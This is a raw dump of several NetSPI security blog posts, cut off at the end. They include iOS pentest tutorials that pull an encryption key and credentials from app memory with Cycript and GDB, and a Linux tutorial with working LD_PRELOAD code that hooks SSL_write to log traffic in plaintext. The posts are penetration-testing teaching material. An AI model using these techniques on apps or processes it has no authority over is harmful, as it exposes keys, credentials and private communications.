Minneapolis, Minnesota  –  ​​​​NetSPI LLC, the leading security testing and vulnerability correlation company, today announced the completion of a strategic growth equity financing led by Sunstone Partners. The investment will allow NetSPI to accelerate development of new products and service offerings, penetrate new verticals, and expand geographically.

NetSPI has grown profitably every year since its founding in 2001, and this financing marks the first institutional capital ever raised by the company. NetSPI currently supports many of the top 10 financial institutions, healthcare providers, and technology companies.

"Our clients are under intense pressure from business, regulatory, and governance perspectives to partner with cybersecurity experts to increase their security posture to safeguard their organization against the volatile and ever-evolving threat landscape.  Our solution portfolio comprises of a world-class proprietary software platform, CorrelatedVM®, encapsulated with deep professional services expertise which is empowering global organizations to scale and operationalize their security programs," said Deke George, NetSPI's Co-Founder and CEO. "We are looking forward to our partnership with Sunstone Partners given their team's successful track record and experience in cybersecurity."

According to the report, "Penetration Testing Market by Testing Service (Network, Web, Mobile, Social Engineering, Wireless, Embedded Devices and Industrial Control System), Deployment Mode (Cloud and On-Premises), Organization Size, Vertical, and Region - Global Forecast to 2021," published by MarketsandMarkets, penetration testing market size is estimated to grow from USD 594.7 Million in 2016 to USD 1,724.3 Million by 2021, at a Compound Annual Growth Rate (CAGR) of 23.7% during the forecast period. 2015 is considered to be the base year while the forecast period is 2016–2021.

"We have known NetSPI for several years and have been consistently impressed by the team's culture, product offering, and loyal customer base," said Gustavo Alberelli, Managing Director at Sunstone Partners. "NetSPI's enterprise customers repeatedly stress their satisfaction and growing need for NetSPI's differentiated solutions, especially given the increasing number of connected applications susceptible to vulnerabilities and advanced persistent threats. Security testing continues to be the fastest-growing subsegment within cybersecurity, and we are excited to partner with the NetSPI team to maximize the company's full potential."

As part of the investment, the new board of directors will include Gustavo Alberelli and Michael Biggee, Managing Directors at Sunstone Partners, Scott Hammack, and Stuart Scholly joined by Deke George. Hammack will serve as NetSPI's Executive Chairman. Hammack and Scholly most recently worked with the Sunstone Partners team while serving as CEO and President respectively of Prolexic Technologies, the leading Distributed Denial of Service (DDoS) mitigation provider, which Akamai acquired in February 2014 for $415 million. Mooreland Partners LLC acted as exclusive financial advisor to NetSPI LLC in connection with this transaction.

About NetSPI

NetSPI is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs.  The solution portfolio includes both security testing services and a software platform, CorrelatedVM®, trusted by many of the Fortune 250. NetSPI's clients consist of financial institutions, healthcare providers, retailers, and technology companies.  NetSPI is based in Minneapolis and has additional offices in New York and Portland.

About Sunstone Partners

Sunstone Partners is an investment firm focused on growth equity investments and majority buyouts in technology businesses. The firm is a spin-out of the growth equity team of Trident Capital, a multi-stage investment firm with seven funds and $1.9 billion of capital under management since 1993. The firm is currently investing out of Sunstone Partners I, LP, a fund with $310 million of committed capital. Sunstone Partners is headquartered in the San Francisco Bay Area.

[post_title] => NetSPI Raises Growth Capital From Sunstone Partners [post_excerpt] => NetSPI LLC, the leading security testing and vulnerability correlation company, today announced the completion of a strategic growth equity financing led by Sunstone Partners. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-raises-growth-capital-from-sunstone-partners [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:56:55 [post_modified_gmt] => 2021-04-14 06:56:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13181 [menu_order] => 410 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [74] => WP_Post Object ( [ID] => 2968 [post_author] => 91 [post_date] => 2015-03-09 07:00:56 [post_date_gmt] => 2015-03-09 07:00:56 [post_content] =>

In my previous blog, iOS Tutorial – Dumping the Application Heap from Memory, I covered how to dump sensitive information from the heap of an iOS application using GDB. This time we will be covering how to use Cycript to accomplish the same goal but using the class-dump-z output to specifically pull out properties or instance variables. This round will be in a more automated fashion by automatically parsing a class dump of the binary and generating the necessary Cycript scripts to pull the specific properties from memory. I will also be releasing another tool to do all of this for you in the near future. Keep an eye on our NetSPI GitHub repo for the latest tools and scripts for when we release it.

If we do not have access to the source code then we must first decrypt the binary. We do this first to dump the class information about the binary. There are several guides out there for decryption but Clutch is my go-to tool for ease of use as it also regenerates an IPA file with the decrypted binary in it so you can install it again on a different device if you have to. After we extract/install the new decrypted binary, we can now run class-dump-z to get the header information with all the classes, properties, class methods, instance methods, etc.

MAPen-iPad-000314:~ root# ./class-dump-z -z TestApp

[TRUNCATED]

@interface CryptoManager : XXUnknownSuperclass {
@private
	NSData* key;
}
@property(retain, nonatomic) NSData* key;
+(id)CryptoManager;
-(id)init;
-(id)cipher:(id)cipher key:(id)key context:(unsigned)context;
-(id)cipher:(id)cipher key:(id)key context:(unsigned)context withIV:(BOOL)iv;
-(id)cipher:(id)cipher key:(id)key context:(unsigned)context withIV:(BOOL)iv usingIV:(id)iv5;
-(id)cipher:(id)cipher key:(id)key context:(unsigned)context withIV:(BOOL)iv usingIV:(id)iv5 withPad-ding:(BOOL)padding;
-(void)clearKey;
-(void)dealloc;
-(id)decryptData:(id)data;
-(id)decryptData:(id)data usingIV:(id)iv;
-(id)decryptData:(id)data usingIV:(id)iv withPadding:(BOOL)padding;
-(id)decryptData:(id)data withIV:(BOOL)iv;
-(id)decryptData:(id)data withIV:(BOOL)iv withHeader:(BOOL)header;
-(id)decryptData:(id)data withKey:(id)key;
-(id)decryptString:(id)string;
-(id)decryptString:(id)string withIV:(BOOL)iv;
-(id)decryptString:(id)string withIV:(BOOL)iv withHeader:(BOOL)header;
-(id)decryptString:(id)string withIV:(BOOL)iv withHeader:(BOOL)header withKey:(id)key;
-(id)decryptString:(id)string withKey:(id)key;
-(id)encryptData:(id)data;
-(int)encryptData:(id)data AndAppendToFileAtPath:(id)path initiatedByUnlockOperation:(BOOL)operation error:(id*)error;
-(id)encryptData:(id)data usingIV:(id)iv;
-(id)encryptData:(id)data withKey:(id)key;
-(id)encryptString:(id)string;
-(id)encryptString:(id)string withKey:(id)key;
-(id)hashString:(id)string;
-(id)hashString:(id)string salt:(id)salt;
-(BOOL)isHashOfString:(id)string equalToHash:(id)hash;
-(BOOL)isHeaderValid:(id)valid;
-(id)newHeader;
-(unsigned long)readEncryptedData:(void**)data atPath:(id)path offset:(long)offset length:(unsigned long)length initiatedByUnlockOperation:(BOOL)operation error:(id*)error;
@end

[TRUNCATED]

So you can see above that TestApp has a class called "CryptoManager" and has a property called "key". This looks interesting as there could be an encryption key sitting there in memory. We will now use Cycript to grab that specific property from memory. Note during runtime, the "CryptoManager" class is instantiated before login but only after a valid user has successfully logged in once before on the device. Also, the class is never cleared out even when it is no longer needed, such as a user logged out, which is where the vulnerability lies. In this instance, we have already logged in successfully during a previous session and therefore the class is already in memory before the user logs in.

First we will hook into the running TestApp process from an SSH session so we can leave the application running on the iOS device.

MAPen-iPad-000314:~ root# cycript -p TestApp
cy#

Now that we are hooked in, let's go ahead and talk about the "choose" method in cycript. The "choose" method scans the heap for the matching class name and returns an array of objects that match that class' structure. So, if we type "choose(MyClass)". It is going to contain an indexed array of all instantiated classes of MyClass that are currently in memory (or that match that structure). The below output is just calling out the first indexed object which is index "0" and storing it into a variable called "a". If you like GDB more, we can also take the memory location returned and go back to GDB for dumping out everything from that sub-region in memory or set breakpoints and watch the registers. See my previous blog on how to scan the heap here (https://blog.netspi.com/ios-tutorial-dumping-the-application-heap-from-memory/). Note however, that there can be more than one class instantiated in this array and you will to go through each index to get the properties of that instantiated class.

cy# a=choose(CryptoManager)
[#"< CryptoManager: 0x17dcc340&gt;",#"&lt; CryptoManager: 0x17f42ba0>"] 

Now let's dump the "key" property from memory so we can grab the key and decrypt any data in the app later on.

cy# a[0].key.hexString
@"6D2268CFFDDC16E890B365910543833190C9C02C4DCA2342A9AEED68428EF9B6"

Bingo! We now have the hexadecimal of the key we need to decrypt anything this application wants to keep encrypted.

Now let's talk about how to automate this and go over what we know and what we have to figure out programmatically as we go. We know that the class-dump-z output contains the output of all the classes and their properties. What we don't know is whether or not those classes are currently instantiated or not. We also don't know how many times the classes are instantiated in memory. What we can do is parse the class-dump-z output and create a map of classes and their properties. Now that we have a map we can now create Cycript scripts to pull the information out for us. Note however, that this technique is for classes that are already instantiated and we won't be covering how to make a new instance of an object in Cycript as there are many tutorials and books on how to do this.

So we have to read Cycript's output from the choose method to figure out how many times the object is instantiated in memory. To do that we can use JavaScript to get the array length:

cy# choose(CryptoManager).length
2
cy#

Cool, now we know how many times to loop through the array to pull out all instantiated "CryptoManager" objects. Now let's move on to cycript scripting.

Cycript can take a script as a parameter and a basic script just has to contain the commands we want to run like so:

MAPen-iPad-000314:~ root# cat dump.cy
a=choose(CryptoManager)[0]
a.key.hexString

MAPen-iPad-000314:~ root# cycript -p TestApp dump.cy
@"6D2268CFFDDC16E890B365910543833190C9C02C4DCA2342A9AEED68428EF9B6"

One issue that I can't seem to figure out is Cycript only returns the last line of output to the terminal when you run a script and doesn't return all output. So to pull out multiple classes and their properties from the terminal, you have to create a new script for each class and property combination.  If anyone knows how to get around this limitation, please feel free to reach out to me on how to accomplish this. Or you can write everything in Cycript JavaScript if that is your preferred language.

Thanks for reading and hack responsibly

[post_title] => iOS Tutorial - Dumping the Application Memory Part 2 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => ios-tutorial-dumping-the-application-memory-part-2 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:30 [post_modified_gmt] => 2021-04-13 00:05:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=2968 [menu_order] => 463 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [75] => WP_Post Object ( [ID] => 2156 [post_author] => 91 [post_date] => 2015-01-05 07:00:47 [post_date_gmt] => 2015-01-05 07:00:47 [post_content] => An essential part of pentesting iOS applications is analyzing the runtime of the application. In this blog, I will be covering how to dump the heap from an iOS application. I will also be releasing a little script to run on the iOS device to dump the heap of a specified application for you. You can download the script from the NetSPI Git Hub. The script basically wraps around GDB, but only dumps the ranges in memory that have "sub-regions". These sub-regions are usually where I find active credentials, anything that is currently being used in the UI, or instantiated class properties. This technique currently only works for iOS 7 and lower or until there is a working GDB version for iOS 8. You also cannot use the version GDB from the default Cydia repositories. You have to use the fixed version in this repository here: "https://cydia.radare.org" or here is a direct link to the deb package: "https://cydia.radare.org/debs/gdb_1708_iphoneos-arm.deb". Below are a few screenshots of the process, and how the script works. First, we launch the application that we want to capture the heap for and log in. MB_iOS_Dump_1 After we log into the app, we will keep it at the first main screen which in this case is the user's timeline. Now we will SSH into the device, so that we can leave the application running without the app being put in the background by iOS. MB_iOS_Dump_2.png Above is the output that the script provides during runtime. Here we are giving the binary name that we want the script to dump. MB_iOS_Dump_3 Above are all the .dmp files that we can now start searching through for the credentials or any other sensitive data. You can usually find encryption keys or passwords from any instantiated classes that use encryption or contain the login process. I personally use a combination of the "strings" command and "xxd" as a hex dumper but you can use any hex editor that works for you. This technique can be used to determine if the application is not removing sensitive information from memory once the instantiated classes are done with the data. All applications should deallocate spaces in memory that deal with classes and methods that were used to handle sensitive information, otherwise you run the risk of the information sitting available in memory for an attacker to see. I've included the GDB commands that are used in the script:
  • gdb --pid="<PID>"
  • info mach-regions (look for sub-regions)
  • dump binary memory heap1.dmp <sub-region range from above>
[post_title] => iOS Tutorial – Dumping the Application Heap from Memory [post_excerpt] => Using GDB to dump the runtime heap from memory to gain access to sensitive information that should’ve been removed. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => ios-tutorial-dumping-the-application-heap-from-memory [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:30 [post_modified_gmt] => 2021-04-13 00:05:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=2156 [menu_order] => 471 [post_type] => post [post_mime_type] => [comment_count] => 10 [filter] => raw ) [76] => WP_Post Object ( [ID] => 1113 [post_author] => 91 [post_date] => 2014-06-30 07:00:00 [post_date_gmt] => 2014-06-30 07:00:00 [post_content] => How many of your projects include open source software? Maybe it is better to call it free software. As a person who has spent time in the corporate world, I get the idea of using open source software. Much of it is free or at very low cost. However, is it secure and how do you go about proving that it is secure? For example, OpenSSL had the Heartbleed vulnerability in it for some time before it was discovered and disclosed. If you are using a piece of software that was not written by your own company, how do you not realize that this software may have vulnerabilities in it that have not been discovered or disclosed? Make sure you find out, either by doing the work yourself or through a third party. We have had many companies tell us not to worry about the results from the open source software because it was not their software and they cannot or will not fix it. If you find vulnerabilities in this open source software, make sure you address them or at least mitigate them. Right now, I am in the middle of a code review for a company that is using an open source framework. I looked it up and the framework has not been modified since July 2012. The framework they are using is full of vulnerabilities, including SQL Injection and cross-site scripting (both persistent and stored). If the person who wrote this code could do it wrong, they did. Out of the 10,000+ vulnerabilities found by the automated code review tool, almost 80% were for the framework. For this company I am doing the code review for, I am going to recommend working with the framework's author to address these vulnerabilities or to try to find a different framework. Maybe one that has been updated recently. I am also going to recommend they look at implementing a web application firewall. If not, they are going to have problems. This framework is a good example of what not to do. Security vulnerabilities, attacks, programming languages, and tools have evolved to make your application much more secure, but your developers need to understand the concepts of secure coding techniques. You also need to evaluate the frameworks you are using and not assume they are safe. [post_title] => Open Source Frameworks - How secure are they? [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => open-source-frameworks-how-secure-are-they [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:06:09 [post_modified_gmt] => 2021-04-13 00:06:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1113 [menu_order] => 486 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [77] => WP_Post Object ( [ID] => 1154 [post_author] => 91 [post_date] => 2013-07-08 07:00:25 [post_date_gmt] => 2013-07-08 07:00:25 [post_content] =>

When assessing an application, one may run into files that have strange or unknown extensions or files not readily consumed by applications associated with those extensions. In these cases it can be helpful to look for tell-tale file format signatures and inferring how the application is using them based on these signatures, as well as how these formats may be abused to provoke undefined behavior within the application. To identify these common file format signatures one typically only need look as far as the first few bytes of the file in question. This is what's often called "magic bytes", a term referring to a block of arcane byte values used to designate a filetype in order for applications to be able to detect whether or not the file they plan to parse and consume is of the proper format. The easiest way to inspect the file in question will be to examine it with a hex editor. Personally for this task I prefer HxD for windows or hexdump under Linux, but really any hex editor should do just fine. With a few exceptions file format signatures are located at offset zero and generally occupy the first two to four bytes starting from the offset. Another notable detail is that these initial sequences of bytes are generally not chosen at random; that is most developers of a given format will choose a file signature whose ASCII representation will be fairly recognizable at a glance as well as unique to the format. This allows us to use the known ASCII representations of these signatures as a sort of mnemonic device to quickly identify a given file's format. Here's a few examples of common file signatures and their accompanying mnemonics:

Executable Binaries Mnemonic Signature
DOS Executable
"MZ"
0x4D 0x5A
PE32 Executable
"MZ"...."PE.."
0x4D 0x5A ... 0x50 0x45 0x00 0x00
Mach-O Executable (32 bit)
"FEEDFACE"
0xFE 0xED 0xFA 0xCE
Mach-O Executable (64 bit)
"FEEDFACF"
0xFE 0xED 0xFA 0xCF
ELF Executable
".ELF"
0x7F 0x45 0x4C 0x46
Compressed Archives Mnemonic Signature
Zip Archive
"PK.."
0x50 0x4B 0x03 0x04
Rar Archive
"Rar!...."
0x52 0x61 0x72 0x21 0x1A 0x07 0x01 0x00
Ogg Container
"OggS"
0x4F 0x67 0x67 0x53
Matroska/EBML Container
N/A
0x45 0x1A 0xA3 0xDF
Image File Formats Mnemonic Signature
PNG Image
".PNG...."
0x89 0x50 0x4E 0x47 0x0D 0x0A 0x1A 0x0A
BMP Image
"BM"
0x42 0x4D
GIF Image
"GIF87a"
0x47 0x49 0x46 0x38 0x37 0x61
 
"GIF89a"
0x47 0x49 0x46 0x38 0x39 0x61

Let's take what we’ve learned so far and apply it toward an "unknown" file, calc.exe.

Justin Bytes Blog

To avoid confusion it's worth noting that the PE32 executable format actually contains at minimum two sets of magic bytes: one set for the DOS executable header for DOS system compatibility and the other set to mark the beginning of the PE32 executable header. In this screenshot I've highlighted the DOS header, where we can see that the beginning of said header is marked with "MZ". Another characteristic of the DOS header that's an immediate give-away is the text "This program cannot be run in DOS mode.", which some may recognize as the error text displayed when one attempts to run a windows application in DOS mode.

Justin Bytes Blog

Following the DOS header and preceding the PE header is what's known as the rich header and is represented in our mnemonic list as the "..." between the DOS and PE magic bytes. This header remains largely undocumented, however, so examining it at length is unlikely to yield any insightful information.

Justin Bytes Blog

Finally, following the DOS and rich headers comes the PE header marked by "PE..", or the byte sequence x50x45x00x00 which indicates that this file is a PE32 executable. Identifying other formats will follow the same principle, only one will generally only need the first step of the above process to identify the file format.

[post_title] => Magic Bytes - Identifying Common File Formats at a Glance [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => magic-bytes-identifying-common-file-formats-at-a-glance [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:49:46 [post_modified_gmt] => 2021-06-08 21:49:46 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1154 [menu_order] => 525 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [78] => WP_Post Object ( [ID] => 1155 [post_author] => 91 [post_date] => 2013-07-08 07:00:05 [post_date_gmt] => 2013-07-08 07:00:05 [post_content] => When assessing an application for weaknesses in a linux environment, we won't always have the luxury of freely available source code or documentation. As a result, these situations require more of a black box approach where much of the information about the application will be revealed by attempting to monitor things such as network communications, calls to cryptographic functions, and file I/O. One method of monitoring applications to extract information is to attach a debugger, such as GDB, to the process and to dump register or stack values as breakpoints are hit for the desired function calls. While this has the advantage of giving fine grained control over things such as code flow and register contents, it is also a cumbersome process compared to hooking the function calls of interest to modify their behavior. Function call hooking refers to a range of techniques used to intercept calls to pre-existing functions and wrap around them to modify the function's behavior at runtime. In this article we'll be focusing on function hooking in linux using the dynamic loader API, which allows us to dynamically load and execute calls from shared libraries on the system at runtime, and allows us to wrap around existing functions by making use of the LD_PRELOAD environment variable. The LD_PRELOAD environment variable is used to specify a shared library that is to be loaded first by the loader. Loading our shared library first enables us to intercept function calls and using the dynamic loader API we can bind the originally intended function to a function pointer and pass the original arguments through it, effectively wrapping the function call. Let's use the ubiquitous “hello world” demonstration as an example. In this example we'll intercept the puts function and change the output. Here's our helloworld.c file:
#include <stdio.h>
#include <unistd.h>
int main()
{
puts("Hello world!n");
return 0;
}
Here's our libexample.c file:
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
int puts(const char *message)
{
int (*new_puts)(const char *message);
int result;
new_puts = dlsym(RTLD_NEXT, "puts");
if(strcmp(message, "Hello world!n") == 0)
{
result = new_puts("Goodbye, cruel world!n");
}
else
{
result = new_puts(message);
}
return result;
}
Let's take a moment to examine what's going on here in our libexample.c file:
  • Line 5 contains our puts function declaration. To intercept the original puts we define a function with the exact same name and function signature as the original libc puts function.
  • Line 7 declares the function pointer new_puts that will point to the originally intended puts function. As before with the intercepting function declaration this pointer's function signature must match the function signature of puts.
  • Line 10 initializes our function pointer using the dlsym() function. The RTLD_NEXT enum tells the dynamic loader API that we want to return the next instance of the function associated with the second argument (in this case puts) in the load order.
  • We compare the argument passed to our puts hook against "Hello world!n" on line 12 and if it matches, we replace it with "Goodbye, cruel world!n". If the two strings do not match we simply pass the original message on to puts on line 14.
Now let's build everything and test it out:
sigma@ubuntu:~/code$ gcc helloworld.c -o helloworld
sigma@ubuntu:~/code$ gcc libexample.c -o libexample.so -fPIC -shared -ldl -D_GNU_SOURCE
sigma@ubuntu:~/code$
First we compile helloworld.c as one normally would. Next we compile libexample.c into a shared library by specifying the -shared and -fPIC compile flags and link against libdl using the -ldl flag. The -D_GNU_SOURCE flag is specified to satisfy #ifdef conditions that allow us to use the RTLD_NEXT enum. Optionally this flag can be replaced by adding "#define _GNU_SOURCE" somewhere near the top of our libexample.c file. After compiling our source files, we set the LD_PRELOAD environment variable to point to the location of our newly created shared library.
sigma@ubuntu:~/code$ export LD_PRELOAD="/home/sigma/code/libexample.so"
After setting LD_PRELOAD we're ready to run our helloworld binary. Executing the binary produces the following output:
sigma@ubuntu:~/code$ ./helloworld
Goodbye, cruel world!
sigma@ubuntu:~/code$
As expected, when our helloworld binary is executed the puts function is intercepted and "Goodbye, cruel world!" rather than the original "Hello world!" string is displayed. Now that we're familiar with the process of hooking function calls let's apply it towards a bit more practical example. Let's pretend for a moment that we have an application that we are assessing and that this application uses OpenSSL to encrypt communications of sensitive data. Let’s also assume that attempts to man-in-the-middle these communications at the network level have been fruitless. To get at this sensitive data we will intercept calls to SSL_write, the function responsible for encrypting then sending data over a socket. Intercepting SSL_write will allow us to log the string sent to the function and pass the original parameters along, effectively bypassing the encryption protections while allowing the application to run normally. To get started let's take a look at the SSL_write function definition:
int SSL_write(SSL *ssl, const void *buf, int num);
Here's the code I’ve written to intercept SSL_write in hook.c:
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <openssl/ssl.h>
int SSL_write(SSL *context, const void *buffer, int bytes)
{
int (*new_ssl_write)(SSL *context, const void *buffer, int bytes);
new_ssl_write = dlsym(RTLD_NEXT, "SSL_write");
FILE *logfile = fopen("logfile", "a+");
fprintf(logfile, "Process %d:nn%snnn", getpid(), (char *)buffer);
fclose(logfile);
return new_ssl_write(context, buffer, bytes);
}
As we can see our function definition needs to return an integer and take three arguments: a pointer to an SSL context, a pointer to a buffer containing the string to encrypt, and the number of bytes to write. In addition to our intercepting function definition we define a matching function pointer that will point to the originally intended SSL_write function and initialize it with the dlsym function. After pointing our pointer to the original function, we log the process ID of the process calling SSL_write, and the string sent to it. Next we compile our source to a shared library:
sigma@ubuntu:~/code$ gcc hook.c -o libhook.so -fPIC -shared -lssl -D_GNU_SOURCE
sigma@ubuntu:~/code$
The only difference between this compilation and last is the -lssl flag, which we specify in order to link our code against the OpenSSL library. Now let's go ahead and set LD_PRELOAD to point to our newly created libhook library:
sigma@ubuntu:~/code$ export LD_PRELOAD="/home/sigma/code/libhook.so"
sigma@ubuntu:~/code$
Now that LD_PRELOAD is set we're ready to start intercepting calls to SSL_write on processes executed from here onward. To test this let's go ahead and use the curl utility over HTTPS and intercept the HTTPS request.
sigma@ubuntu:~/code$ curl https://www.netspi.com > /dev/null
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed
100 19086 0 19086 0 0 37437 0 --:--:-- --:--:-- --:--:-- 60590
sigma@ubuntu:~/code$
After successful completion of the command there should be a log file that we can examine:
sigma@ubuntu:~/code$ cat logfile
Process 11423:
GET / HTTP/1.1
User-Agent: curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
Host: www.netspi.com
Accept: */*
sigma@ubuntu:~/code$
As we can see the request has been logged in plaintext, while the application was allowed to function normally. Had this been a scenario where data integrity relied heavily upon SSL encryption and the assumption that man-in-the-middle attacks would be occurring only at the network level, any such integrity would have been compromised. These are really just a few examples of what's possible using the dynamic loader API and LD_PRELOAD. Since the shared library we create will be loaded into the running process' memory space we could do things like dump the memory of the process to examine the memory at runtime or tamper with runtime variables. Other uses for this method of function call hooking and loading generally fall under the use case of user-land rootkits and malware, which will be the focus on the next article in this series. [post_title] => Function Hooking Part I: Hooking Shared Library Function Calls in Linux [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => function-hooking-part-i-hooking-shared-library-function-calls-in-linux [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:44 [post_modified_gmt] => 2021-04-13 00:05:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1155 [menu_order] => 524 [post_type] => post [post_mime_type] => [comment_count] => 5 [filter] => raw ) [79] => WP_Post Object ( [ID] => 1156 [post_author] => 91 [post_date] => 2013-06-24 07:00:43 [post_date_gmt] => 2013-06-24 07:00:43 [post_content] => Let’s go back in time to June, 2012. LinkedIn was compromised and 6.5 million password hashes were released to the internet. Everyone changed their password (right?) and it wasn't *that* big a deal. Now, let’s jump forward in time, to sometime when biometric authentication becomes more common. In this new era, LinkedIn gets compromised, and 6.5 million hashed fingerprints are released to the internet…so everyone does what? Do users switch the fingers they use for authentication? Biometric authentication is a great idea that, unfortunately, suffers from some serious drawbacks, especially when deployed in the cloud.  Biometric authentication’s greatest weakness is immutability. Your fingerprints aren’t going to change, and failing some pretty major plastic surgery, your face won’t either. This basically means one big problem: You can’t change a compromised biometric. Do you have any publicly accessible pictures on Facebook? What about videos? Could those be used to hack facial recognition, even with liveness detection? The way your biometric features are set in stone mean there is a much greater responsibility to protect them, and unfortunately you aren’t the only one who bears that responsibility. Cloud services that leverage biometrics aren’t super common yet, but assuming biometrics catch on, it’s only a matter of time before the marketing types make it happen. How is that data stored? Can you really trust your service provider to take better care of your fingerprint than your password? Millions of passwords get exposed by hacks like the LinkedIn hack every year. Most services require users to register at least two fingerprints to use fingerprint-based auth; that gives users at MAX 10 password resets for an entire lifetime. After that, the data used for authentication starts repeating: which fingers you use for authentication may change, but if an attacker has compromised a fingerprint, they can use that fingerprint to bruteforce any authentication schema that relies on the compromised finger’s data – a kind of known-plaintext attack. That isn’t the only issue with immutability, either. There is a reason best practices recommend using separate passwords for separate services. If you use biometric authentication for multiple services, the security of your access to those services is linked (just like with a normal password). Basically, you’re trusting every service provider with the password to your other accounts. Maybe that’s okay with you; you’re fine if some social network knows your bank account password. Unfortunately for you, it isn’t that simple. If that social network ever gets compromised, within hours your bank account password will be on Pastebin, and I’ll eat my hat if some enterprising script kiddie doesn’t have a bot testing out username/fingerprint combinations to every bank service they can find. This only gets worse once you run out of fingers to authenticate with. If anyone ever associates all ten fingerprints with your identity, no account you ever create will be safe with biometric authentication again. Maybe I’m being a little histrionic. That would be totally fair. There are a bunch of practices that could (maybe not totally) mitigate these issues. And, after all, biometrics are supposed to be part of a dual-factor authentication scheme, right? So we’ll at least have a password in addition to our fingerprints. And any serious company who deploys biometric authentication will surely encrypt the data, and keep it somewhere safe, away from the key. Then again, take a look at biometric authentication right now. My coworker Karl wrote a blog about consumer grade fingerprint readers in Lenovo laptops. His conclusion was that the software was pretty lax about storing sensitive data. What happens when practices like that move into realms like banking and health care? Truth be told, I don’t think this problem is unsolvable. It’s always possible to simply not use biometrics! For anyone who still wants to use biometric authentication, just take this warning and exercise real caution in the storage of your users’ data, and keep in mind that the technology needs some serious refinement before consumer-grade biometric scanners provide any real protection. [post_title] => Biometrics in the age of Pastebin [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => biometrics-in-the-age-of-pastebin [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:35 [post_modified_gmt] => 2021-04-13 00:05:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1156 [menu_order] => 526 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [80] => WP_Post Object ( [ID] => 1157 [post_author] => 91 [post_date] => 2013-06-17 07:00:17 [post_date_gmt] => 2013-06-17 07:00:17 [post_content] => CA SiteMinder is a secure Single Sign-On (SSO) and Web access management product that is used to authenticate users and control access to web applications and portals. Your company may be considering purchasing SiteMinder or a similar product, or may have already deployed a solution like SiteMinder in your environment. Out of the box, CA SiteMinder can prevent some of the typical OWASP Top 10 vulnerabilities. These include SQL Injection and Cross-site scripting (XSS). I worked with it a few years ago in my previous job and it worked well,.  That is until the developers got involved. Their business requirements had them pass full SQL statements from the browser to their application. Additionally, many of them think they needed to also pass in the “” to the Web application. We had to tweak CA SiteMinder to allow these types of requests. As you may have guessed, their application was now potentially vulnerable to SQL Injection and XSS. These dangerous configurations also make some of CA SiteMinder’s standard web pages vulnerable to XSS. CA SiteMinder comes with some standard web pages and executables that you can use in your Web application. These include loginandregister-dms.fcc, loginandregisterwithforgottenpassword-dms.fcc, login.fcc and smpwservicescgi.exe. By not allowing CA SiteMinder to stop the XSS attacks, these Web pages also become vulnerable. NetSPI has performed application penetration tests in the last few months where the applications were using CA SiteMinder. The applications we were testing were vulnerable to XSS; both the application itself and the CA SiteMinder files. SiteMinder is intended to reduce risk, not expand it. These vulnerabilities could have been prevented by not configuring CA SiteMinder so it does not block XSS. Do not allow the developers to dictate that the security be weakened; work with them and reduce their requests to the most basic requirements and figure out how to securely deliver what they need. Remember, security and development should be partners, not bitter rivals. You want multiple layers of prevention, so if your application is vulnerable, CA SiteMinder will prevent the vulnerability from being exploited. [post_title] => Great, you use CA SiteMinder, but you broke it! [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => great-you-use-ca-siteminder-but-you-broke-it [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:06:25 [post_modified_gmt] => 2021-04-13 00:06:25 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1157 [menu_order] => 527 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [81] => WP_Post Object ( [ID] => 1167 [post_author] => 91 [post_date] => 2013-04-11 07:00:33 [post_date_gmt] => 2013-04-11 07:00:33 [post_content] => Many times during our mobile application penetration testing, we are finding the applications are vulnerable to man-in-the-middle attacks (MITM). Certificate pinning is one part of the answer to MITM attacks in a mobile application. For those who do not know about certificate pinning, this is not pinning your CISSP certificate to the wall.

What is it?

Certificate pinning is hardcoding or storing the information for digital certificates/public keys in a mobile application. Since the predefined certificates are used for secure communication, all others will fail, even if the user trusted other certificates. In a mobile application, the application knows what servers they will connect to, so that the application can check for those specific certificates. A browser cannot implement certificate pinning, since it is designed for general-purpose communication.

What happens during an SSL Connection?

When an application sees an SSL certificate from a server, it should verify two things:
  1. The certificate signed by a root certificate authority (CA)
